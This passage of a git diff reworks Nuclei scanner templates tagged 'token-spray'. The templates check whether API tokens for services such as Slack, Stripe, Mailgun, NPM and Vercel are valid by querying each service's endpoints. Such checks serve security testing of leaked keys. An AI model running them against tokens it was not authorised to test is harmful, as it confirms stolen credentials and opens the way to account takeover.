'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/nuclei-templates/Other/api-launchdarkly-449.yaml b/nuclei-templates/Other/api-launchdarkly-449.yaml deleted file mode 100644 index b9467edd41..0000000000 --- a/nuclei-templates/Other/api-launchdarkly-449.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-launchdarkly -info: - name: LaunchDarkly REST API - author: Luqmaan Hadia - severity: info - reference: - - https://apidocs.launchdarkly.com/ - tags: token-spray,launchdarkly -self-contained: true -requests: - - raw: - - | - GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 - Host: app.launchdarkly.com - Authorization: {{token}} - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"totalCount":' - - '"items":' - condition: and diff --git a/nuclei-templates/Other/api-launchdarkly.yaml b/nuclei-templates/Other/api-launchdarkly.yaml new file mode 100644 index 0000000000..636ca9f02f --- /dev/null +++ b/nuclei-templates/Other/api-launchdarkly.yaml @@ -0,0 +1,28 @@ +id: api-launchdarkly + +info: + name: LaunchDarkly REST API + author: Luqmaan Hadia + severity: info + reference: https://apidocs.launchdarkly.com/ + tags: token-spray,launchdarkly + +self-contained: true +requests: + - raw: + - | + GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 + Host: app.launchdarkly.com + Authorization: {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"totalCount":' + - '"items":' + condition: and diff --git a/nuclei-templates/Other/api-leanix.yaml b/nuclei-templates/Other/api-leanix-450.yaml similarity index 100% rename from nuclei-templates/Other/api-leanix.yaml rename to nuclei-templates/Other/api-leanix-450.yaml diff --git a/nuclei-templates/Other/api-linkfinder.yaml b/nuclei-templates/Other/api-linkfinder.yaml deleted file mode 100644 index 38c579ea74..0000000000 --- a/nuclei-templates/Other/api-linkfinder.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-linkfinder - -info: - name: API Recon - author: nullenc0de - severity: info - tags: file - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - name: url_params - regex: - - '[&\?][a-zA-Z0-9\_]+=' - - type: regex - name: relative_links - regex: - - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|)) diff --git a/nuclei-templates/Other/api-lokalise-452.yaml b/nuclei-templates/Other/api-lokalise-452.yaml deleted file mode 100644 index 1434df2c20..0000000000 --- a/nuclei-templates/Other/api-lokalise-452.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-lokalise - -info: - name: Lokalise API Test - author: zzeitlin - severity: info - reference: https://app.lokalise.com/api2docs/curl/#resource-projects - - -self-contained: true -requests: - - method: GET - path: - - "https://api.lokalise.com/api2/teams" - headers: - x-api-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"teams":' - - '"team_id":' - - '"name":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-lokalise.yaml b/nuclei-templates/Other/api-lokalise.yaml new file mode 100644 index 0000000000..36e050c15d --- /dev/null +++ b/nuclei-templates/Other/api-lokalise.yaml @@ -0,0 +1,17 @@ +id: api-lokalise +info: + name: Lokalise API Test + author: zzeitlin + reference: https://app.lokalise.com/api2docs/curl/#resource-projects + severity: info + tags: token-spray,lokalise +requests: + - method: GET + path: + - "https://api.lokalise.com/api2/projects/" + headers: + X-Api-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-loqate-453.yaml b/nuclei-templates/Other/api-loqate.yaml similarity index 100% rename from nuclei-templates/Other/api-loqate-453.yaml rename to nuclei-templates/Other/api-loqate.yaml diff --git a/nuclei-templates/Other/api-mailchimp.yaml b/nuclei-templates/Other/api-mailchimp.yaml index 5232ddda97..68d9d200ce 100644 --- a/nuclei-templates/Other/api-mailchimp.yaml +++ b/nuclei-templates/Other/api-mailchimp.yaml @@ -1,20 +1,16 @@ id: api-mailchimp - info: name: Mailchimp API Test author: zzeitlin - severity: info reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info tags: token-spray,mailchimp - -self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.mandrillapp.com:465" - matchers: - type: word words: diff --git a/nuclei-templates/Other/api-mailgun.yaml b/nuclei-templates/Other/api-mailgun.yaml new file mode 100644 index 0000000000..5e92fa4a97 --- /dev/null +++ b/nuclei-templates/Other/api-mailgun.yaml @@ -0,0 +1,17 @@ +id: api-mailgun +info: + name: Mailgun API Test + author: zzeitlin + reference: https://documentation.mailgun.com/en/latest/api-intro.html + severity: info + tags: token-spray,mailgun +requests: + - method: GET + path: + - "https://api.mailgun.net/v3/domains" + headers: + Authorization: Basic {{base64('api:' + token)}} + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-malshare-456.yaml b/nuclei-templates/Other/api-malshare-456.yaml index b1108b4e33..d486f6f0fd 100644 --- a/nuclei-templates/Other/api-malshare-456.yaml +++ b/nuclei-templates/Other/api-malshare-456.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://malshare.com/doc.php - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md tags: token-spray,malshare self-contained: true diff --git a/nuclei-templates/Other/api-malwarebazaar.yaml b/nuclei-templates/Other/api-malwarebazaar-459.yaml similarity index 100% rename from nuclei-templates/Other/api-malwarebazaar.yaml rename to nuclei-templates/Other/api-malwarebazaar-459.yaml diff --git a/nuclei-templates/Other/api-mapbox-465.yaml b/nuclei-templates/Other/api-mapbox-465.yaml index d742b68f1b..d38dadc2a8 100644 --- a/nuclei-templates/Other/api-mapbox-465.yaml +++ b/nuclei-templates/Other/api-mapbox-465.yaml @@ -1,23 +1,16 @@ id: api-mapbox - info: name: Mapbox API Test author: zzeitlin reference: https://docs.mapbox.com/api/search/geocoding/ severity: info - - -self-contained: true + tags: token-spray,mapbox requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - matchers: - - type: word - part: body - words: - - 'type' - - 'query' - - 'features' - condition: and + - type: status + status: + - 401 + negative: true diff --git a/nuclei-templates/Other/api-mywot-467.yaml b/nuclei-templates/Other/api-mywot-468.yaml similarity index 100% rename from nuclei-templates/Other/api-mywot-467.yaml rename to nuclei-templates/Other/api-mywot-468.yaml diff --git a/nuclei-templates/Other/api-npm-471.yaml b/nuclei-templates/Other/api-npm-471.yaml new file mode 100644 index 0000000000..e97673f901 --- /dev/null +++ b/nuclei-templates/Other/api-npm-471.yaml @@ -0,0 +1,23 @@ +id: api-npm + +info: + name: NPM API Test + author: zzeitlin + severity: info + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + + +self-contained: true +requests: + - method: GET + path: + - "https://registry.npmjs.org/-/whoami" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: status + status: + - 401 + - 403 + negative: true diff --git a/nuclei-templates/Other/api-npm.yaml b/nuclei-templates/Other/api-npm.yaml deleted file mode 100644 index a1e3db47b4..0000000000 --- a/nuclei-templates/Other/api-npm.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-npm -info: - name: NPM API Test - author: zzeitlin - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens - severity: info - tags: token-spray,node,npm,package,manager -requests: - - method: GET - path: - - "https://registry.npmjs.org/-/whoami" - headers: - Authorization: Bearer {{token}} - matchers: - - type: status - status: - - 401 - - 403 - negative: true diff --git a/nuclei-templates/Other/api-openweather-473.yaml b/nuclei-templates/Other/api-openweather-473.yaml deleted file mode 100644 index 158ddb3ccf..0000000000 --- a/nuclei-templates/Other/api-openweather-473.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: api-openweather -info: - name: OpenWeather API Test - author: zzeitlin - reference: https://openweathermap.org/current - severity: info - tags: token-spray,weather,openweather -requests: - - method: GET - path: - - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-pagerduty.yaml b/nuclei-templates/Other/api-pagerduty.yaml deleted file mode 100644 index 6456f587ae..0000000000 --- a/nuclei-templates/Other/api-pagerduty.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-pagerduty -info: - name: Pagerduty API Test - author: zzeitlin - reference: https://developer.pagerduty.com/api-reference - severity: info - tags: token-spray,pagerduty -requests: - - method: GET - path: - - "https://api.pagerduty.com/schedules" - headers: - Accept: application/vnd.pagerduty+json;version=2 - Authorization: Token token={{token}} - matchers: - - type: status - status: - - 401 - negative: true diff --git a/nuclei-templates/Other/api-pendo.yaml b/nuclei-templates/Other/api-pendo.yaml deleted file mode 100644 index d7492ce8a5..0000000000 --- a/nuclei-templates/Other/api-pendo.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-pendo -info: - name: Pendo API Test - author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html - severity: info - tags: token-spray,pendo -requests: - - method: GET - path: - - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" - headers: - Content-Type: application/json - X-Pendo-Integration-Key: "{{token}}" - matchers: - - type: status - status: - - 403 - negative: true diff --git a/nuclei-templates/Other/api-petfinder-480.yaml b/nuclei-templates/Other/api-petfinder-480.yaml deleted file mode 100644 index 3f63ed4eef..0000000000 --- a/nuclei-templates/Other/api-petfinder-480.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-petfinder -info: - name: Petfinder API Test - author: daffainfo - severity: info - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md - tags: token-spray,petfinder -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/nuclei-templates/Other/api-petfinder.yaml b/nuclei-templates/Other/api-petfinder.yaml new file mode 100644 index 0000000000..ae0b6866a1 --- /dev/null +++ b/nuclei-templates/Other/api-petfinder.yaml @@ -0,0 +1,31 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and diff --git a/nuclei-templates/Other/api-pivotaltracker-482.yaml b/nuclei-templates/Other/api-pivotaltracker-482.yaml new file mode 100644 index 0000000000..aaeac3eacf --- /dev/null +++ b/nuclei-templates/Other/api-pivotaltracker-482.yaml @@ -0,0 +1,24 @@ +id: api-pivotaltracker + +info: + name: PivotalTracker API Test + author: zzeitlin + reference: https://www.pivotaltracker.com/help/api + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://www.pivotaltracker.com/services/v5/me" + headers: + X-TrackerToken: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_authentication' + - 'unauthenticated' diff --git a/nuclei-templates/Other/api-pivotaltracker.yaml b/nuclei-templates/Other/api-pivotaltracker.yaml deleted file mode 100644 index f46a5fb6ed..0000000000 --- a/nuclei-templates/Other/api-pivotaltracker.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-pivotaltracker -info: - name: PivotalTracker API Test - author: zzeitlin - reference: https://www.pivotaltracker.com/help/api - severity: info - tags: token-spray,pivotaltracker -requests: - - method: GET - path: - - "https://www.pivotaltracker.com/services/v5/me" - headers: - X-TrackerToken: "{{token}}" - matchers: - - type: word - part: body - negative: true - words: - - 'invalid_authentication' diff --git a/nuclei-templates/Other/api-postmark.yaml b/nuclei-templates/Other/api-postmark.yaml new file mode 100644 index 0000000000..419b023723 --- /dev/null +++ b/nuclei-templates/Other/api-postmark.yaml @@ -0,0 +1,18 @@ +id: api-postmark +info: + name: PostMark API Test + author: zzeitlin + reference: https://postmarkapp.com/developer/api/overview + severity: info + tags: token-spray,postmark +requests: + - method: GET + path: + - "https://api.postmarkapp.com/stats/outbound" + headers: + Accept: application/json + X-Postmark-Server-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-quip-484.yaml b/nuclei-templates/Other/api-quip-484.yaml new file mode 100644 index 0000000000..6fabacb6de --- /dev/null +++ b/nuclei-templates/Other/api-quip-484.yaml @@ -0,0 +1,23 @@ +id: api-quip +info: + name: Quip API Test + author: daffainfo + severity: info + reference: + - https://quip.com/dev/automation/documentation + - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md + tags: token-spray,quip +self-contained: true +requests: + - raw: + - | + GET https://platform.quip.com/1/users/current HTTP/1.1 + Host: platform.quip.com + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"id":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-quip.yaml b/nuclei-templates/Other/api-quip.yaml deleted file mode 100644 index 70239345aa..0000000000 --- a/nuclei-templates/Other/api-quip.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-quip - -info: - name: Quip API Test - author: daffainfo - severity: info - description: File Sharing and Storage for groups - reference: - - https://quip.com/dev/automation/documentation - - https://github.com/daffainfo/all-about-apikey/tree/main/quip - tags: token-spray,quip - -self-contained: true -requests: - - raw: - - | - GET https://platform.quip.com/1/users/current HTTP/1.1 - Host: platform.quip.com - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"id":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-rijksmuseum-486.yaml b/nuclei-templates/Other/api-rijksmuseum.yaml similarity index 100% rename from nuclei-templates/Other/api-rijksmuseum-486.yaml rename to nuclei-templates/Other/api-rijksmuseum.yaml diff --git a/nuclei-templates/Other/api-scanii-488.yaml b/nuclei-templates/Other/api-scanii-488.yaml deleted file mode 100644 index a50bcb42a1..0000000000 --- a/nuclei-templates/Other/api-scanii-488.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-scanii - -info: - name: Scanii API Test - author: daffainfo - severity: info - reference: - - https://docs.scanii.com/v2.1/resources.html - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md - tags: token-spray,scanii - -self-contained: true -requests: - - raw: - - | - GET https://api.scanii.com/v2.1/ping HTTP/1.1 - Authorization: Basic {{base64(api + ':' + secret)}} - Host: api.scanii.com - - matchers: - - type: word - part: body - words: - - '"key"' - - '"message" : "pong"' - condition: and diff --git a/nuclei-templates/Other/api-scanii.yaml b/nuclei-templates/Other/api-scanii.yaml new file mode 100644 index 0000000000..9c9b50f9e0 --- /dev/null +++ b/nuclei-templates/Other/api-scanii.yaml @@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/nuclei-templates/Other/sendgrid.yaml b/nuclei-templates/Other/api-sendgrid.yaml similarity index 100% rename from nuclei-templates/Other/sendgrid.yaml rename to nuclei-templates/Other/api-sendgrid.yaml diff --git a/nuclei-templates/Other/api-slack.yaml b/nuclei-templates/Other/api-slack.yaml new file mode 100644 index 0000000000..37f2441d46 --- /dev/null +++ b/nuclei-templates/Other/api-slack.yaml @@ -0,0 +1,19 @@ +id: api-slack +info: + name: Slack API Test + author: zzeitlin + reference: https://api.slack.com/methods/auth.test + severity: info + tags: token-spray,slack +requests: + - method: POST + path: + - "https://slack.com/api/auth.test" + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/nuclei-templates/Other/api-sonarcloud-494.yaml b/nuclei-templates/Other/api-sonarcloud-494.yaml index 6963e2eb83..c33160fe64 100644 --- a/nuclei-templates/Other/api-sonarcloud-494.yaml +++ b/nuclei-templates/Other/api-sonarcloud-494.yaml @@ -1,22 +1,18 @@ id: api-sonarcloud - info: name: SonarCloud API Test author: zzeitlin - severity: info reference: https://sonarcloud.io/web_api/api/authentication - - -self-contained: true + severity: info + tags: token-spray,sonarcloud requests: - method: GET path: - "https://sonarcloud.io/api/authentication/validate" headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body words: - - '{"valid": true}' + - 'true' diff --git a/nuclei-templates/Other/api-spotify-495.yaml b/nuclei-templates/Other/api-spotify-495.yaml deleted file mode 100644 index 289c24509a..0000000000 --- a/nuclei-templates/Other/api-spotify-495.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: api-spotify -info: - name: Spotify API Test - author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ - severity: info - tags: token-spray,spotify -requests: - - method: GET - path: - - "https://api.spotify.com/v1/me" - headers: - Authorization: Bearer {{token}} - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-spotify.yaml b/nuclei-templates/Other/api-spotify.yaml new file mode 100644 index 0000000000..ee518e36b4 --- /dev/null +++ b/nuclei-templates/Other/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-square-496.yaml b/nuclei-templates/Other/api-square-496.yaml new file mode 100644 index 0000000000..f90e538715 --- /dev/null +++ b/nuclei-templates/Other/api-square-496.yaml @@ -0,0 +1,21 @@ +id: api-square +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: token-spray,square +requests: + - method: GET + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/nuclei-templates/Other/api-square.yaml b/nuclei-templates/Other/api-square.yaml deleted file mode 100644 index 7ccb835189..0000000000 --- a/nuclei-templates/Other/api-square.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-square - -info: - name: Square API Test - author: zzeitlin - reference: https://developer.squareup.com/explorer/square/locations-api/list-locations - severity: info - tags: token-spray,square - -self-contained: true -requests: - - method: GET - path: - - "https://connect.squareup.com/v2/locations" - - "https://connect.squareupsandbox.com/v2/locations" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'errors' - negative: true diff --git a/nuclei-templates/Other/api-sslmate-497.yaml b/nuclei-templates/Other/api-sslmate-497.yaml deleted file mode 100644 index e6bcfe12ee..0000000000 --- a/nuclei-templates/Other/api-sslmate-497.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-sslmate -info: - name: SSLMate API Test - author: 0ri2N - severity: info - reference: - - https://sslmate.com - - https://sslmate.com/help/ - - https://sslmate.com/help/reference/apiv2 - tags: dns,ssl,recon,sslmate,token-spray -self-contained: true -requests: - - method: GET - path: - - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"exists"' - - '"wildcard"' - - '"auto_renew"' - condition: and diff --git a/nuclei-templates/Other/api-sslmate.yaml b/nuclei-templates/Other/api-sslmate.yaml new file mode 100644 index 0000000000..940d325e12 --- /dev/null +++ b/nuclei-templates/Other/api-sslmate.yaml @@ -0,0 +1,28 @@ +id: api-sslmate + +info: + name: SSLMate API Test + author: 0ri2N + severity: info + reference: + - https://sslmate.com + - https://sslmate.com/help/ + - https://sslmate.com/help/reference/apiv2 + tags: dns,ssl,recon,sslmate,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://sslmate.com/api/v2/certs/example.com?expand=current.crt + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"exists"' + - '"wildcard"' + - '"auto_renew"' + condition: and diff --git a/nuclei-templates/Other/api-stripe.yaml b/nuclei-templates/Other/api-stripe.yaml deleted file mode 100644 index e75c2692bc..0000000000 --- a/nuclei-templates/Other/api-stripe.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: api-stripe -info: - name: Stripe API Test - author: zzeitlin - reference: https://stripe.com/docs/api/authentication - severity: info - tags: token-spray,stripe -requests: - - method: GET - path: - - "https://api.stripe.com/v1/charges" - headers: - Authorization: Basic {{base64(token + ':')}} - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-thecatapi-502.yaml b/nuclei-templates/Other/api-thecatapi-502.yaml new file mode 100644 index 0000000000..30a0507cb6 --- /dev/null +++ b/nuclei-templates/Other/api-thecatapi-502.yaml @@ -0,0 +1,23 @@ +id: api-thecatapi +info: + name: TheCatApi API Test + author: daffainfo + severity: info + reference: + - https://docs.thecatapi.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md + tags: token-spray,thecatapi +self-contained: true +requests: + - method: GET + path: + - "https://api.thecatapi.com/v1/votes" + headers: + x-api-key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"country_code":' + - '"created_at":' + condition: and diff --git a/nuclei-templates/Other/api-thecatapi-503.yaml b/nuclei-templates/Other/api-thecatapi-503.yaml deleted file mode 100644 index 54740e47d8..0000000000 --- a/nuclei-templates/Other/api-thecatapi-503.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-thecatapi - -info: - name: TheCatApi API Test - author: daffainfo - severity: info - reference: - - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md - tags: token-spray,thecatapi - -self-contained: true -requests: - - method: GET - path: - - "https://api.thecatapi.com/v1/votes" - headers: - x-api-key: "{{token}}" - - matchers: - - type: word - part: body - words: - - 'id":' - - 'image_id":' - - 'sub_id":' - condition: and diff --git a/nuclei-templates/Other/api-tink-504.yaml b/nuclei-templates/Other/api-tink-504.yaml deleted file mode 100644 index c8049aec74..0000000000 --- a/nuclei-templates/Other/api-tink-504.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-tink -info: - name: Tink API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.tink.com/api - tags: token-spray,tink -self-contained: true -requests: - - method: GET - path: - - "https://api.tink.com/api/v1/user" - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - "appId" - - "externalUserId" - - "username" - condition: and diff --git a/nuclei-templates/Other/api-tink.yaml b/nuclei-templates/Other/api-tink.yaml new file mode 100644 index 0000000000..a7c5de8ccd --- /dev/null +++ b/nuclei-templates/Other/api-tink.yaml @@ -0,0 +1,25 @@ +id: api-tink + +info: + name: Tink API Test + author: dwisiswant0 + reference: https://docs.tink.com/api + severity: info + tags: token-spray,tink + +self-contained: true +requests: + - method: GET + path: + - "https://api.tink.com/api/v1/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "appId" + - "externalUserId" + - "username" + condition: and diff --git a/nuclei-templates/Other/api-tinypng.yaml b/nuclei-templates/Other/api-tinypng-505.yaml similarity index 100% rename from nuclei-templates/Other/api-tinypng.yaml rename to nuclei-templates/Other/api-tinypng-505.yaml diff --git a/nuclei-templates/Other/api-urlscan-508.yaml b/nuclei-templates/Other/api-urlscan-508.yaml index bcb14d8c1c..93d5b196db 100644 --- a/nuclei-templates/Other/api-urlscan-508.yaml +++ b/nuclei-templates/Other/api-urlscan-508.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://urlscan.io/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true diff --git a/nuclei-templates/Other/api-vercel-510.yaml b/nuclei-templates/Other/api-vercel-510.yaml new file mode 100644 index 0000000000..4f5b8351cb --- /dev/null +++ b/nuclei-templates/Other/api-vercel-510.yaml @@ -0,0 +1,23 @@ +id: api-vercel +info: + name: Vercel API Test + author: dwisiswant0 + severity: info + reference: + - https://vercel.com/docs/rest-api + tags: token-spray,vercel +self-contained: true +requests: + - method: GET + path: + - "https://api.vercel.com/www/user" + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"user":' + - '"username":' + - '"email":' + condition: and diff --git a/nuclei-templates/Other/api-vercel.yaml b/nuclei-templates/Other/api-vercel.yaml deleted file mode 100644 index 0c3baed35a..0000000000 --- a/nuclei-templates/Other/api-vercel.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-vercel - -info: - name: Vercel API Test - author: dwisiswant0 - severity: info - reference: https://vercel.com/docs/rest-api - tags: token-spray,vercel - -self-contained: true -requests: - - method: GET - path: - - "https://api.vercel.com/www/user" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"user":' - - '"username":' - - '"email":' - condition: and diff --git a/nuclei-templates/Other/api-virustotal.yaml b/nuclei-templates/Other/api-virustotal-512.yaml similarity index 100% rename from nuclei-templates/Other/api-virustotal.yaml rename to nuclei-templates/Other/api-virustotal-512.yaml diff --git a/nuclei-templates/Other/api-wakatime-514.yaml b/nuclei-templates/Other/api-wakatime-514.yaml deleted file mode 100644 index bab9482288..0000000000 --- a/nuclei-templates/Other/api-wakatime-514.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: api-wakatime -info: - name: WakaTime CI API Test - author: zzeitlin - reference: https://wakatime.com/developers - severity: info - tags: token-spray,wakatime -requests: - - method: GET - path: - - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - matchers: - - type: status - status: - - 401 - negative: true diff --git a/nuclei-templates/Other/api-webex-515.yaml b/nuclei-templates/Other/api-webex-515.yaml deleted file mode 100644 index 4158e150c5..0000000000 --- a/nuclei-templates/Other/api-webex-515.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-webex -info: - name: Cisco Webex API Test - author: dwisiswant0 - severity: info - reference: - - https://developer.webex.com/docs/getting-started - tags: token-spray,cisco,webex -self-contained: true -requests: - - method: GET - path: - - "https://webexapis.com/v1/rooms" - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - 'id' - - 'title' - - 'type' - condition: and diff --git a/nuclei-templates/Other/api-webex.yaml b/nuclei-templates/Other/api-webex.yaml new file mode 100644 index 0000000000..c5e61ded0b --- /dev/null +++ b/nuclei-templates/Other/api-webex.yaml @@ -0,0 +1,25 @@ +id: api-webex + +info: + name: Cisco Webex API Test + author: dwisiswant0 + severity: info + reference: https://developer.webex.com/docs/getting-started + tags: token-spray,cisco,webex + +self-contained: true +requests: + - method: GET + path: + - "https://webexapis.com/v1/rooms" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'id' + - 'title' + - 'type' + condition: and diff --git a/nuclei-templates/Other/api-weglot-516.yaml b/nuclei-templates/Other/api-weglot-516.yaml deleted file mode 100644 index cf6fd834e7..0000000000 --- a/nuclei-templates/Other/api-weglot-516.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-weglot -info: - name: WeGlot API Test - author: zzeitlin - reference: https://developers.weglot.com/api/reference - severity: info - tags: token-spray,weglot -requests: - - method: POST - path: - - "https://api.weglot.com/translate?api_key={{token}}" - headers: - Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - matchers: - - type: word - part: body - negative: true - words: - - 'does not exist' diff --git a/nuclei-templates/Other/api-wordcloud.yaml b/nuclei-templates/Other/api-wordcloud-517.yaml similarity index 100% rename from nuclei-templates/Other/api-wordcloud.yaml rename to nuclei-templates/Other/api-wordcloud-517.yaml diff --git a/nuclei-templates/Other/api-youtube-519.yaml b/nuclei-templates/Other/api-youtube-519.yaml deleted file mode 100644 index 0913478aad..0000000000 --- a/nuclei-templates/Other/api-youtube-519.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-youtube - -info: - name: YouTube API Test - author: zzeitlin - reference: https://developers.google.com/youtube/v3/docs - severity: info - - -self-contained: true -requests: - - method: GET - path: - - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"kind":' - - '"pageInfo":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-youtube.yaml b/nuclei-templates/Other/api-youtube.yaml new file mode 100644 index 0000000000..acc719424f --- /dev/null +++ 